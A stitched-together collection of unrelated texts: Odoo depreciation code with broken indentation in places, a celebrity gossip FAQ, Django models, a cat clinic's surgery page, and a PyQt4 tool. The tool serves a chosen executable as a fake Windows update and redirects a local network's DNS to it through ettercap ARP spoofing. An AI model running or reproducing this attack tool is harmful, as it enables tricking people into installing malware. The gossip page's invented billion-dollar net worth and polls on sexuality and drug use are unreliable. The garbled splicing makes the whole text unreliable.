    def check_before_generate_depreciation_lines(self, dep_date):
        """Guard against generating depreciation lines at `dep_date`.

        Raises ValidationError when:
        - the recordset is empty;
        - any depreciation already has (non partial-dismissal) depreciation
          lines newer than `dep_date`;
        - any line at `dep_date` is already linked to a posted move.
        """
        # Check if self is a valid recordset
        if not self:
            raise ValidationError(
                _("Cannot create any depreciation according to current"
                  " settings.")
            )

        lines = self.mapped('line_ids')

        # Check if any depreciation already has newer depreciation lines
        # than the given date
        newer_lines = lines.filtered(
            lambda l: l.move_type == 'depreciated'
            and not l.partial_dismissal
            and l.date > dep_date
        )
        if newer_lines:
            asset_names = ', '.join([
                asset_name for asset_id, asset_name in
                newer_lines.mapped('depreciation_id.asset_id').name_get()
            ])
            raise ValidationError(
                _("Cannot update the following assets which contain"
                  " newer depreciations for the chosen types:\n{}")
                .format(asset_names)
            )

        # Lines dated `dep_date` whose account move is already posted
        # cannot be regenerated.
        posted_lines = lines.filtered(
            lambda l: l.date == dep_date
            and l.move_id
            and l.move_id.state != 'draft'
        )
        if posted_lines:
            posted_names = ', '.join([
                asset_name for asset_id, asset_name in
                posted_lines.mapped('depreciation_id.asset_id').name_get()
            ])
            raise ValidationError(
                _("Cannot update the following assets which contain"
                  " posted depreciation for the chosen date and types:\n{}")
                .format(posted_names)
            )
    def generate_depreciation_lines(self, dep_date):
        """Validate, then create one depreciation line per record at
        `dep_date`; returns the newly created lines as a recordset."""
        # Set new date within context if necessary
        self.check_before_generate_depreciation_lines(dep_date)

        new_lines = self.env['asset.depreciation.line']
        for dep in self:
            new_lines |= dep.generate_depreciation_lines_single(dep_date)

        return new_lines

    def generate_depreciation_lines_single(self, dep_date):
        """Create the next numbered depreciation line for this record."""
        self.ensure_one()
        # Context keys (dep_nr, used_asset, dep_amount) are consumed by
        # `prepare_depreciation_line_vals` and downstream line logic.
        dep_nr = self.get_max_depreciation_nr() + 1
        dep = self.with_context(dep_nr=dep_nr, used_asset=self.asset_id.used)

        dep_amount = dep.get_depreciation_amount(dep_date)
        dep = dep.with_context(dep_amount=dep_amount)

        vals = dep.prepare_depreciation_line_vals(dep_date)
        return self.env['asset.depreciation.line'].create(vals)
def generate_dismiss_account_move(self):
self.ensure_one()
am_obj = self.env['account.move']
vals = self.get_dismiss_account_move_vals()
if 'line_ids' not in vals:
vals['line_ids'] = []
line_vals = self.get_dismiss_account_move_line_vals()
for v in line_vals:
vals['line_ids'].append((0, 0, v))
self.dismiss_move_id = am_obj.create(vals)
    def get_computed_amounts(self):
        """Return a dict of `amount_*` values recomputed from the lines.

        Line balances are grouped by `get_balances_grouped` (keyed by
        group name) and mapped, as absolute values, onto the matching
        `amount_<group>` field when such a field exists.
        """
        self.ensure_one()
        vals = {
            'amount_{}'.format(k): abs(v)
            for k, v in self.line_ids.get_balances_grouped().items()
            if 'amount_{}'.format(k) in self._fields
        }
        if self.asset_id.sold:
            # A sold asset has nothing left to depreciate.
            vals.update({
                'amount_depreciable_updated': 0,
                'amount_residual': 0
            })
        else:
            non_residual_types = self.line_ids.get_non_residual_move_types()
            update_move_types = self.line_ids.get_update_move_types()
            amt_dep = self.amount_depreciable
            vals.update({
                # Depreciable base corrected by every "update" movement.
                'amount_depreciable_updated': amt_dep + sum([
                    l.balance for l in self.line_ids
                    if l.move_type in update_move_types
                ]),
                # What is still left to depreciate.
                'amount_residual': amt_dep + sum([
                    l.balance for l in self.line_ids
                    if l.move_type not in non_residual_types
                ])
            })
        return vals
def get_depreciable_amount(self, dep_date=None):
types = self.line_ids.get_update_move_types()
return self.amount_depreciable + sum([
l.balance for l in self.line_ids
if l.move_type in types and (not dep_date or l.date <= dep_date)
])
    def get_depreciation_amount(self, dep_date):
        """Compute the amount to depreciate at `dep_date`.

        Returns 0 while inside the optional zero-depreciation window, and
        caps the result at the residual amount.
        """
        self.ensure_one()
        zero_dep_date = self.zero_depreciation_until
        if zero_dep_date and dep_date <= zero_dep_date:
            return 0

        # Get depreciable amount, multiplier and digits
        amount = self.get_depreciable_amount(dep_date)
        multiplier = self.get_depreciation_amount_multiplier(dep_date)
        digits = self.env['decimal.precision'].precision_get('Account')
        dep_amount = round(amount * multiplier, digits)

        # If amount_residual < dep_amount: use amount_residual as dep_amount
        if float_compare(self.amount_residual, dep_amount, digits) < 0:
            dep_amount = self.amount_residual

        return dep_amount
    def get_depreciation_amount_multiplier(self, dep_date):
        """Return the fraction of the depreciable base to apply at `dep_date`.

        Combines the base percentage, the mode's own multiplier and, when
        pro-rata temporis applies (field or `force_prorata` context key),
        the fraction of the fiscal year involved.
        Raises ValidationError when `dep_date` precedes `date_start`.
        """
        self.ensure_one()

        # Base multiplier
        multiplier = self.percentage / 100

        # Update multiplier from depreciation mode data
        multiplier *= self.mode_id.get_depreciation_amount_multiplier()

        # Update multiplier from pro-rata temporis
        date_start = self.date_start
        if dep_date < date_start:
            dt_start_str = fields.Date.from_string(date_start).strftime(
                '%d-%m-%Y'
            )
            raise ValidationError(
                _("Depreciations cannot start before {}.").format(dt_start_str)
            )

        if self.pro_rata_temporis or self._context.get('force_prorata'):
            fiscal_year_obj = self.env['account.fiscal.year']
            fy_start = fiscal_year_obj.get_fiscal_year_by_date(
                date_start, company=self.company_id
            )
            fy_dep = fiscal_year_obj.get_fiscal_year_by_date(
                dep_date, company=self.company_id
            )
            if fy_dep == fy_start:
                # If current depreciation lies within the same fiscal year in
                # which the asset was registered, compute multiplier as a
                # difference from date_dep multiplier and start_date
                # multiplier, plus 1/lapse to avoid "skipping" one day
                fy_end = fields.Date.from_string(fy_dep.date_to)
                fy_start = fields.Date.from_string(fy_dep.date_from)
                lapse = (fy_end - fy_start).days + 1
                dep_multiplier = self.get_pro_rata_temporis_multiplier(
                    dep_date, 'dte'
                )
                start_multiplier = self.get_pro_rata_temporis_multiplier(
                    self.date_start, 'dte'
                )
                multiplier *= start_multiplier - dep_multiplier + 1 / lapse
            else:
                # Otherwise, simply compute multiplier with respect to how
                # many days have passed since the beginning of the fiscal year
                multiplier *= self.get_pro_rata_temporis_multiplier(
                    dep_date, 'std'
                )

        return multiplier
def get_depreciation_state(self):
self.ensure_one()
digits = self.env['decimal.precision'].precision_get('Account')
depreciable = self.amount_depreciable
residual = self.amount_residual
updated = self.amount_depreciable_updated
if float_is_zero(depreciable, digits):
return 'non_depreciated'
elif float_is_zero(residual, digits):
return 'totally_depreciated'
elif float_compare(residual, updated, digits) < 0:
return 'partially_depreciated'
else:
return 'non_depreciated'
def get_dismiss_account_move_line_vals(self):
self.ensure_one()
credit_line_vals = {
'account_id': self.asset_id.category_id.asset_account_id.id,
'credit': self.amount_depreciated,
'debit': 0.0,
'currency_id': self.currency_id.id,
'name': _("Asset dismissal: ") + self.asset_id.make_name(),
}
debit_line_vals = {
'account_id': self.asset_id.category_id.fund_account_id.id,
'credit': 0.0,
'debit': self.amount_depreciated,
'currency_id': self.currency_id.id,
'name': _("Asset dismissal: ") + self.asset_id.make_name(),
}
return [credit_line_vals, debit_line_vals]
def get_dismiss_account_move_vals(self):
self.ensure_one()
return {
'company_id': self.company_id.id,
'date': self.asset_id.sale_date,
'journal_id': self.asset_id.category_id.journal_id.id,
'line_ids': [],
'ref': _("Asset dismissal: ") + self.asset_id.make_name(),
}
def get_max_depreciation_nr(self):
self.ensure_one()
num_lines = self.line_ids.filtered('requires_depreciation_nr')
nums = num_lines.mapped('depreciation_nr')
if not nums:
nums = [0]
return max(nums)
def get_pro_rata_temporis_dates(self, date):
"""
Gets useful dates for pro rata temporis computations, according to
given date, by retrieving its fiscal year.
:param date: given date for depreciation
:return: date objects triplet (dt_start, dt, dt_end)
- dt_start: fiscal year first day
- dt: given date
- dt_end: fiscal year last day
"""
if not date:
raise ValidationError(
_("Cannot compute pro rata temporis for unknown date.")
)
fiscal_year_obj = self.env['account.fiscal.year']
fiscal_year = fiscal_year_obj.get_fiscal_year_by_date(
date, company=self.company_id
)
if not fiscal_year:
date_str = fields.Date.from_string(date).strftime('%d/%m/%Y')
raise ValidationError(
_("No fiscal year defined for date {}") + date_str
)
return (
fields.Date.from_string(fiscal_year.date_from),
fields.Date.from_string(date),
fields.Date.from_string(fiscal_year.date_to)
)
    def get_pro_rata_temporis_multiplier(self, date=None, mode='std'):
        """
        Computes and returns pro rata temporis multiplier according to given
        depreciation, date, fiscal year and mode
        :param date: given date as a fields.Date string
        :param mode: string, defines how to compute multiplier. Valid values:
            - 'std': start-to-date, computes multiplier using days from fiscal
              year's first day to given date;
            - 'dte': date-to-end, computes multiplier using days from given
              date to fiscal year's last day
        :return: float fraction of the fiscal year; 1 when pro-rata
            temporis does not apply to this depreciation
        :raise NotImplementedError: for any unsupported `mode` value
        """
        self.ensure_one()
        # Without pro-rata temporis (field or `force_prorata` context key)
        # the full-period multiplier applies.
        if not (self.pro_rata_temporis or self._context.get('force_prorata')):
            return 1
        dt_start, dt, dt_end = self.get_pro_rata_temporis_dates(date)
        # Total number of days in the fiscal year (bounds included).
        lapse = (dt_end - dt_start).days + 1
        if mode == 'std':
            return ((dt - dt_start).days + 1) / lapse
        elif mode == 'dte':
            return ((dt_end - dt).days + 1) / lapse
        elif mode:
            raise NotImplementedError(
                _("Cannot get pro rata temporis multiplier for mode `{}`")
                .format(mode)
            )
        raise NotImplementedError(
            _("Cannot get pro rata temporis multiplier for unspecified mode")
        )
def make_name(self):
self.ensure_one()
return " - ".join((self.asset_id.make_name(), self.type_id.name or ""))
    def need_normalize_first_dep_nr(self):
        """Tell whether `first_dep_nr` is inconsistent with the force flags.

        - `force_all_dep_nr`: numbering is fully manual, never normalize;
        - `force_first_dep_nr`: only a non-positive first number is invalid;
        - otherwise the first number must be exactly 1.
        """
        self.ensure_one()
        if self.force_all_dep_nr:
            return False
        if self.force_first_dep_nr:
            if self.first_dep_nr <= 0:
                return True
        else:
            if self.first_dep_nr != 1:
                return True
        return False

    def normalize_first_dep_nr(self, force=False):
        """
        Normalize first numbered line according to `first_dep_nr` value
        :param force: if True, force normalization
        """
        # Callers (e.g. create) may also force via the context key.
        force = force or self._context.get('force_normalize_first_dep_nr')
        for d in self:
            if force or d.need_normalize_first_dep_nr():
                # Reuse the onchange logic to reset an invalid number to 1.
                d.onchange_normalize_first_dep_nr()
    def post_generate_depreciation_lines(self, lines=None):
        """After generating lines, create account moves for those whose
        depreciation type requires one."""
        lines = lines or self.env['asset.depreciation.line']
        lines.filtered('requires_account_move').button_generate_account_move()

    def prepare_depreciation_line_vals(self, dep_date):
        """Build the `asset.depreciation.line` create() values for a
        depreciation dated `dep_date`.

        The amount is read from the context key `dep_amount`, set by
        `generate_depreciation_lines_single`.
        Raises ValidationError when `dep_date` is None.
        """
        self.ensure_one()
        if dep_date is None:
            raise ValidationError(
                _("Cannot create a depreciation line without a date")
            )
        dep_amount = self._context.get('dep_amount') or 0.0
        dep_year = fields.Date.from_string(dep_date).year
        return {
            'amount': dep_amount,
            'date': dep_date,
            'depreciation_id': self.id,
            'move_type': 'depreciated',
            'name': _("{} - Depreciation").format(dep_year)
        }
|
John Francis Daley FAQs 2019- Facts, Rumors and the latest Gossip.
John Francis Daley FAQs: Facts, Rumors, Birthdate, Net Worth, Sexual Orientation and much more!
Who is John Francis Daley? Biography, gossip, facts?
John Francis Daley (born July 20 1985) is an American television and film actor and screenwriter sometimes credited as John Daley or John Francis Daly. He is best known for playing Sam Weir on the NBC comedy-drama Freaks and Geeks and his current role as Dr. Lance Sweets on the series Bones. He plays keyboards and sings for the band Dayplayer.
How does John Francis Daley look like? How did John Francis Daley look like young?
This is how John Francis Daley looks like. The photo hopefully gives you an impression of John Francis Daley's look, life and work.
When is John Francis Daley's birthday?
John Francis Daley was born on the 20th of July 1985 , which was a Saturday. John Francis Daley will be turning 34 in only 91 days from today.
How old is John Francis Daley?
John Francis Daley is 33 years old. To be more precise (and nerdy), the current age as of right now is 12075 days or (even more geeky) 289800 hours. That's a lot of hours!
Are there any books, DVDs or other memorabilia of John Francis Daley? Is there a John Francis Daley action figure?
We would think so. You can find a collection of items related to John Francis Daley right here.
What is John Francis Daley's zodiac sign and horoscope?
John Francis Daley's zodiac sign is Cancer.
The ruling planet of Cancer is the Moon. Therefore, lucky days are Tuesdays and lucky numbers are: 9, 18, 27, 36, 45, 54, 63 and 72. Orange, Lemon and Yellow are John Francis Daley's lucky colors. Typical positive character traits of Cancer include: Good Communication Skills, Gregariousness, Diplomacy, Vivacity and Enthusiasm. Negative character traits could be: Prevarication, Instability, Indecision and Laziness.
Is John Francis Daley gay or straight?
Many people enjoy sharing rumors about the sexuality and sexual orientation of celebrities. We don't know for a fact whether John Francis Daley is gay, bisexual or straight. However, feel free to tell us what you think! Vote by clicking below.
67% of all voters think that John Francis Daley is gay (homosexual), 22% voted for straight (heterosexual), and 11% like to think that John Francis Daley is actually bisexual.
Is John Francis Daley still alive? Are there any death rumors?
Yes, as far as we know, John Francis Daley is still alive. We don't have any current information about John Francis Daley's health. However, being younger than 50, we hope that everything is ok.
Are there any photos of John Francis Daley's hairstyle or shirtless?
Where was John Francis Daley born?
John Francis Daley was born in United States, Wheeling Illinois.
Is John Francis Daley hot or not?
Well, that is up to you to decide! Click the "HOT"-Button if you think that John Francis Daley is hot, or click "NOT" if you don't think so.
81% of all voters think that John Francis Daley is hot, 19% voted for "Not Hot".
What is John Francis Daley's birth name?
John Francis Daley's birth name is John Francis Daley.
Do you have a photo of John Francis Daley?
There you go. This is a photo of John Francis Daley or something related.
When did John Francis Daley's career start? How long ago was that?
John Francis Daley's career started in 1999. That is more than 20 years ago.
Does John Francis Daley do drugs? Does John Francis Daley smoke cigarettes or weed?
It is no secret that many celebrities have been caught with illegal drugs in the past. Some even openly admit their drug usage. Do you think that John Francis Daley does smoke cigarettes, weed or marijuana? Or does John Francis Daley do steroids, coke or even stronger drugs such as heroin? Tell us your opinion below.
19% of the voters think that John Francis Daley does do drugs regularly, 44% assume that John Francis Daley does take drugs recreationally and 38% are convinced that John Francis Daley has never tried drugs before.
Who are similar persons to John Francis Daley?
Dilshad Akhtar, Gregory C. Case, Joy Chambers, Simon Degge and Kalinda Vazquez are persons that are similar to John Francis Daley. Click on their names to check out their FAQs.
What is John Francis Daley doing now?
Supposedly, 2019 has been a busy year for John Francis Daley. However, we do not have any detailed information on what John Francis Daley is doing these days. Maybe you know more. Feel free to add the latest news, gossip, official contact information such as mangement phone number, cell phone number or email address, and your questions below.
What is John Francis Daley's net worth in 2019? How much does John Francis Daley earn?
According to various sources, John Francis Daley's net worth has grown significantly in 2019. However, the numbers vary depending on the source. If you have current knowledge about John Francis Daley's net worth, please feel free to share the information below.
John Francis Daley's net worth is estimated to be in the range of approximately $1120499148 in 2019, according to the users of vipfaq. The estimated net worth includes stocks, properties, and luxury goods such as yachts and private airplanes.
|
from django.db import models
class Blueprint(models.Model):
    """Generic named blueprint.

    Consistency fix: every other model in this module defines ``__str__``
    returning its name; this one was missing it, so instances rendered as
    the unhelpful default ``Blueprint object`` in the admin and shell.
    """
    name = models.CharField(max_length=30)

    def __str__(self):
        return self.name
class MineBlueprint(models.Model):
    # Template describing a buildable mine's production characteristics.
    name = models.CharField(max_length=30, unique=True)
    # Maximum amount the mine can produce per time unit.
    max_output_rate = models.FloatField()
    # NOTE(review): plain integer -- presumably identifies the resource type
    # produced; confirm against callers.
    output = models.IntegerField()
    # Upper bound on how much output the mine can store.
    max_capacity = models.FloatField()
    def __str__(self):
        return self.name
class FactoryBlueprint(models.Model):
    # Template describing a buildable factory's production characteristics.
    # NOTE(review): field-for-field identical to MineBlueprint -- a shared
    # abstract base model would remove the duplication (schema change, so
    # left as-is here).
    name = models.CharField(max_length=30, unique=True)
    # Maximum amount the factory can produce per time unit.
    max_output_rate = models.FloatField()
    # NOTE(review): presumably identifies the resource type produced; confirm.
    output = models.IntegerField()
    # Upper bound on how much output the factory can store.
    max_capacity = models.FloatField()
    def __str__(self):
        return self.name
class ResourceType(models.Model):
    # Catalogue entry naming one kind of resource.
    name = models.CharField(max_length=30, unique=True)
    # Optional bundle of resources needed to produce one unit of this type.
    # NOTE(review): ForeignKey without on_delete -- this code targets
    # Django < 2.0 (matches the South migrations elsewhere in this dump).
    requirements = models.ForeignKey('Resources', blank=True, null=True)
    def __str__(self):
        return self.name
class Mine(models.Model):
    name = models.CharField(max_length=30, unique=True)
    # Stockpile of resources currently held by this mine.
    all_resources = models.ForeignKey('Resources')
    # Map position of the mine.
    coordinates = models.ForeignKey('Coordinates')
    # NOTE(review): plain integer rather than a ForeignKey to MineBlueprint --
    # presumably stores a blueprint id; confirm against callers before
    # changing the schema.
    blueprint = models.IntegerField()
    production_level = models.FloatField()
    def __str__(self):
        return self.name
class Coordinates(models.Model):
    # 2-D map position referenced by structures such as Mine.
    x = models.FloatField()
    y = models.FloatField()
class Resource(models.Model):
    # A quantity of one specific resource type.
    amount = models.FloatField()
    resource_type = models.ForeignKey('ResourceType')
class Resources(models.Model):
    # A bag of Resource rows; shared by Mine.all_resources and
    # ResourceType.requirements.
    all_resources = models.ManyToManyField('Resource')
|
When a feline family member is due to undergo surgery, it is natural for owners to be concerned. Even if it’s just a routine spay or neuter, the procedure still involves the use of anesthesia and a period of recovery. That’s why it’s important to place your trust in confident hands.
The sole focus of Dr. Dunkle and the staff of Exclusively Cats is to provide the best possible care to our patients. We understand their unique health needs and work carefully to ensure that when a surgical procedure is necessary, it is conducted with the utmost safety and care.
We have experience performing a wide range of feline surgical procedures. These range from spay and neuter procedures, feline dental cleanings, biopsies, and mass removals to abdominal exploratories, bladder stone removals, mastectomies, and more.
When you bring your cat to our veterinary hospital for a procedure, we follow a series of steps to ensure the best possible outcome. Prior to surgery, your kitty will undergo a physical exam and age-appropriate blood work screening. We will be checking to see if there are any pre-existing conditions that might put your cat at risk.
On admission, our staff will take an extensive history to confirm that your cat is not showing any new symptoms of disease. Our veterinarian will review your cat’s blood test results and listen to the heart and lungs, checking for murmurs or congestion, plus check for a decline in body condition or other abnormalities that occurred since your cat’s last physical. Rest assured that our veterinarian and staff will always put your kitty’s health needs first when determining whether a surgery should proceed.
After the pre-op evaluation, your cat will receive pain medication and other medications as is appropriate for the procedure being performed that day. Our compassionate and skilled veterinary nursing staff will be carefully monitoring your cat’s heart and respiration rates, body temperature, mucous membrane color, and overall anesthesia depth from induction of anesthesia to recovery. The surgical nurse is in constant “hands on” and “stethoscope on” contact with your cat during the entire surgery. Even during pre- and post-operative periods, the doctor is never more than a few feet away.
Once we have completed the surgery, we will settle your feline into our intensive care unit and do all that is needed to ensure a safe recovery. We will then call you with an update and arrange for your cat’s discharge. Many surgeries are outpatient, but on occasion your cat may need to stay with us overnight to aid healing. At the discharge meeting, we will carefully review with you any post-surgery instructions that are necessary for caring for your feline friend at home.
We are committed to providing top-quality care to our patients. In addition to being active members of the American Association of Feline Practitioners, Dr. Dunkle and the entire veterinary staff continually study the latest updates and developments in feline surgical medicine.
Please contact us to ask any surgical questions you may have or to learn more.
“ She and her staff are always accessible and truly care about the cats entrusted to them. We are so glad to have found such a wonderful practice. ” — Wanda R.
Monday: 8:30 a.m. – 6 p.m.
Tuesday: 8:30 a.m. – 6 p.m.
Wednesday: 2 p.m. – 8 p.m.
Thursday: 1 p.m. – 7 p.m.
Friday: 8:30 a.m. – 12 p.m.
Saturday: 8:30 a.m. – 12 p.m.
The materials offered on this website are intended for educational purposes only. Exclusively Cats Veterinary Hospital does not provide veterinary medical services or guidance via the Internet. Please consult your pets' veterinarian in matters regarding the care of your animals.
Copyright © 2016 Exclusively Cats Veterinary Hospital. All rights reserved.
|
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from os import getcwd,popen,chdir,walk,path,remove,stat,getuid
from Modules.DHCPstarvation import frm_dhcp_Attack,conf_etter
from platform import linux_distribution
from Core.Settings import frm_Settings
from re import search
import threading
from shutil import copyfile
class frm_update_attack(QMainWindow):
    """Top-level window hosting the Windows Update attack generator widget."""
    def __init__(self, parent=None):
        super(frm_update_attack, self).__init__(parent)
        self.form_widget = frm_WinSoftUp(self)
        self.setCentralWidget(self.form_widget)
        self.setWindowTitle("Windows Update Attack Generator ")
        self.setWindowIcon(QIcon('rsc/icon.ico'))
        self.config = frm_Settings()
        self.loadtheme(self.config.XmlThemeSelected())
    def loadtheme(self,theme):
        """Apply the stylesheet Core/<theme>.css to this window.

        Fix: the original branched on ``theme != "theme2"`` but executed
        byte-identical code in both branches, so the dead if/else was
        collapsed into the single equivalent code path.
        """
        sshFile=("Core/%s.css"%(theme))
        with open(sshFile,"r") as fh:
            self.setStyleSheet(fh.read())
class frm_WinSoftUp(QWidget):
    """Widget implementing a fake software-update phishing attack.

    Lets the operator pick an .exe payload and a network interface, serves a
    fake "Windows Update" page from a local PHP web server, and redirects
    victims to it via an ettercap DNS-spoofing (ARP MITM) attack.

    NOTE(review): this is Python 2 / PyQt4 code (``except OSError,e`` and
    ``print e`` below); keep it on a Python 2 interpreter.
    """
    def __init__(self, parent=None):
        super(frm_WinSoftUp, self).__init__(parent)
        self.Main = QVBoxLayout()
        # Flag: set to 1 once the phishing web server thread is running,
        # reset to None when it exits; dns_start() refuses to run while None.
        self.control = None
        # Reused for its network helpers (interface list, local IP lookup).
        self.module2 = frm_dhcp_Attack()
        # Absolute path of the payload .exe chosen via getpath().
        self.path_file = None
        # Remember the original working directory; threadServer() chdir()s
        # into the attack page directory and must come back afterwards.
        self.owd = getcwd()
        self.GUI()
    def GUI(self):
        """Build and lay out all widgets (no logic, construction only)."""
        self.form = QFormLayout(self)
        self.grid = QGridLayout(self)
        self.grid1 = QGridLayout(self)
        self.path = QLineEdit(self)
        self.logBox = QListWidget(self)
        self.path.setFixedWidth(400)
        #combobox
        self.cb_interface = QComboBox(self)
        self.refresh_interface(self.cb_interface)
        #label
        self.lb_interface = QLabel("Network Adapter:")
        # buttons
        self.btn_open = QPushButton("...")
        self.btn_start = QPushButton("Start DNS",self)
        self.btn_stop = QPushButton("Stop",self)
        self.btn_reload = QPushButton("refresh",self)
        self.btn_start_server = QPushButton("Start Server",self)
        # size
        self.btn_open.setMaximumWidth(90)
        self.btn_start.setFixedHeight(50)
        self.btn_stop.setFixedHeight(50)
        self.btn_start_server.setFixedHeight(50)
        #icons
        self.btn_start.setIcon(QIcon("rsc/start.png"))
        self.btn_open.setIcon(QIcon("rsc/open.png"))
        self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
        self.btn_reload.setIcon(QIcon("rsc/refresh.png"))
        self.btn_start_server.setIcon(QIcon("rsc/server.png"))
        # connect buttons
        self.btn_start.clicked.connect(self.dns_start)
        self.btn_open.clicked.connect(self.getpath)
        self.btn_reload.clicked.connect(self.inter_get)
        self.btn_start_server.clicked.connect(self.server_start)
        self.btn_stop.clicked.connect(self.stop_attack)
        # radionButton
        self.rb_windows = QRadioButton("Windows Update",self)
        self.rb_windows.setIcon(QIcon("rsc/winUp.png"))
        self.rb_adobe = QRadioButton("Adobe Update", self)
        self.rb_adobe.setIcon(QIcon("rsc/adobe.png"))
        self.rb_java = QRadioButton("Java Update", self)
        self.rb_java.setIcon(QIcon("rsc/java.png"))
        self.grid.addWidget(self.rb_windows, 0,1)
        self.grid.addWidget(self.rb_adobe, 0,2)
        self.grid.addWidget(self.rb_java, 0,3)
        # check interface
        self.grid.addWidget(self.lb_interface,1,1)
        self.grid.addWidget(self.cb_interface,1,2)
        self.grid.addWidget(self.btn_reload, 1,3)
        #grid 2
        self.grid1.addWidget(self.btn_start_server,0,2)
        self.grid1.addWidget(self.btn_start,0,3)
        self.grid1.addWidget(self.btn_stop,0,4)
        #form add layout
        self.form.addRow(self.path,self.btn_open)
        self.form.addRow(self.grid)
        self.form.addRow(self.grid1)
        self.form.addRow(self.logBox)
        self.Main.addLayout(self.form)
        self.setLayout(self.Main)
    def stop_attack(self):
        """Kill the attack: close all xterm children, restore etter.dns and
        delete the staged phishing page and payload.

        NOTE(review): alt_etter() reads self.path_file_etter, which is only
        assigned in dns_start(); pressing Stop before ever starting the DNS
        attack raises AttributeError -- confirm and guard upstream.
        """
        # Both the PHP server and ettercap run inside xterm windows.
        popen("killall xterm")
        # Rewrite etter.dns with an empty ruleset to undo the spoof entry.
        self.alt_etter("")
        if path.isfile("Modules/Win-Explo/Windows_Update/index.html"):
            remove("Modules/Win-Explo/Windows_Update/index.html")
        if path.isfile("Modules/Win-Explo/Windows_Update/windows-update.exe"):
            remove("Modules/Win-Explo/Windows_Update/windows-update.exe")
        QMessageBox.information(self,"Clear Setting", "log cLear success ")
    def inter_get(self):
        """Slot for the refresh button: repopulate the interface combobox."""
        self.refresh_interface(self.cb_interface)
    def refresh_interface(self,cb):
        """Fill combobox *cb* with every network interface that has an IP."""
        self.module2 = frm_dhcp_Attack()
        cb.clear()
        n = self.module2.placa()
        for i,j in enumerate(n):
            # Only offer interfaces that are up (have a local IP address).
            if self.module2.get_ip_local(n[i]) != None:
                if n[i] != "":
                    cb.addItem(n[i])
    def server_start(self):
        """Stage the fake update page plus payload and launch the web server.

        Requires a payload path (from getpath()) and root privileges; the
        payload is copied to the page directory as windows-update.exe and the
        page template's "KBlenfile" placeholder is replaced with its size.
        """
        if len(self.path.text()) <= 0:
            QMessageBox.information(self, "Path file Error", "Error in get the file path.")
        else:
            # NOTE(review): only the Windows Update template is implemented;
            # the Adobe/Java radio buttons are currently ignored.
            if self.rb_windows.isChecked():
                directory = "Modules/Win-Explo/Windows_Update/"
                self.logBox.addItem("[+] Set page Attack.")
                try:
                    if path.isfile(directory+"windows-update.exe"):
                        remove(directory+"windows-update.exe")
                    copyfile(self.path_file,directory+"windows-update.exe")
                except OSError,e:
                    print e
                # Double negative: equivalent to "if running as root".
                if not getuid() != 0:
                    file_html = open("Modules/Win-Explo/Settings_WinUpdate.html","r").read()
                    # Show the real payload size (in KB) on the fake page.
                    settings_html = file_html.replace("KBlenfile", str(self.getSize(self.path_file))+"KB")
                    if path.isfile(directory+"index.html"):
                        remove(directory+"index.html")
                    confFile = open(directory+"index.html","w")
                    confFile.write(settings_html)
                    confFile.close()
                    self.t = threading.Thread(target=self.threadServer,args=(directory,),)
                    self.t.daemon = True
                    self.t.start()
                else:
                    QMessageBox.information(self, "Permission Denied", 'the Tool must be run as root try again.')
                    self.logBox.clear()
                    # Not root: remove the staged payload again.
                    if path.isfile(directory+"windows-update.exe"):
                        remove(directory+"windows-update.exe")
    def dns_start(self):
        """Point every DNS name at this host and start the spoofing attack.

        Locates ettercap's etter.dns, writes a wildcard A record for the
        selected interface's IP, then runs ettercap in a background thread.
        Refuses to run until the phishing server is up (self.control set).
        """
        if self.control != None:
            self.logBox.addItem("[+] Settings Etter.dns.")
            ipaddress = self.module2.get_ip_local(str(self.cb_interface.currentText()))
            # Wildcard rule: resolve every hostname to the attacker's IP.
            config_dns = ("* A %s"%(ipaddress))
            self.path_file_etter = self.find("etter.dns", "/etc/ettercap/")
            self.logBox.addItem("[+] check Path Ettercap.")
            # Fall back to the alternate install location used by some distros.
            if self.path_file_etter == None:
                self.path_file_etter = self.find("etter.dns", "/usr/share/ettercap/")
                if not self.path_file_etter != None:
                    QMessageBox.information(self, 'Path not Found', "the file etter.dns not found check if ettercap this installed")
            if self.path_file_etter != None:
                self.alt_etter(config_dns)
                self.thread2 = threading.Thread(target=self.ThreadDNS, args=(str(self.cb_interface.currentText()),))
                self.thread2.daemon = True
                self.thread2.start()
        else:
            QMessageBox.information(self, 'Server Phishing Error', "Error not start Server...")
    def threadServer(self,directory):
        """Worker thread: serve *directory* over HTTP on port 80.

        Uses PHP's built-in web server inside an xterm; blocks until the
        xterm closes, then cleans up the staged page and payload.
        """
        self.logBox.addItem("[+] Get IP local network.")
        ip = self.module2.get_ip_local(self.cb_interface.currentText())
        try:
            chdir(directory)
        except OSError:
            pass
        # Free port 80 in case a system Apache instance is bound to it.
        popen("service apache2 stop")
        self.control = 1
        # popen().read() blocks here until the xterm/PHP server exits.
        n = (popen("""xterm -geometry 75x15-1+0 -T "Windows Fake update " -e php -S %s:80"""%(ip))).read() + "exit"
        chdir(self.owd)
        # "dsa" is an arbitrary sentinel used to leave the loop exactly once.
        while n != "dsa":
            if n == "exit":
                self.logBox.clear()
                n = "dsa"
                self.control = None
                if path.isfile(directory+"index.html") and path.isfile(directory+"windows-update.exe"):
                    remove(directory+"windows-update.exe")
                    remove(directory+"index.html")
                break
    def ThreadDNS(self,interface):
        """Worker thread: run ettercap ARP MITM + dns_spoof on *interface*.

        Kali's ettercap build needs the explicit '// //' target spec, hence
        the distribution check. Blocks until the xterm closes.
        """
        self.logBox.addItem("[+] Start Attack all DNS.")
        distro = linux_distribution()
        if search("Kali Linux",distro[0]):
            n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof // //"""%(interface,interface)).read()) + "exit"
        else:
            n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof """%(interface,interface)).read()) + "exit"
        # Same single-pass sentinel pattern as threadServer().
        while n != "dsa":
            if n == "exit":
                #self.dns_status(False)
                self.logBox.clear()
                n = "dsa"
                break
    def getpath(self):
        """Slot for the '...' button: pick the payload .exe and remember it."""
        file = QFileDialog.getOpenFileName(self, 'Open Executable file',filter='*.exe')
        if len(file) > 0:
            self.path_file = file
            self.path.setText(file)
    def alt_etter(self,data):
        """Overwrite ettercap's etter.dns with a config containing *data*.

        NOTE(review): requires self.path_file_etter to have been set by
        dns_start() first.
        """
        configure = conf_etter(data)
        file = open(self.path_file_etter, "w")
        file.write(configure)
        file.close()
    def find(self,name, paths):
        """Return the full path of file *name* under *paths*, or None."""
        for root, dirs, files in walk(paths):
            if name in files:
                return path.join(root, name)
    def getSize(self,filename):
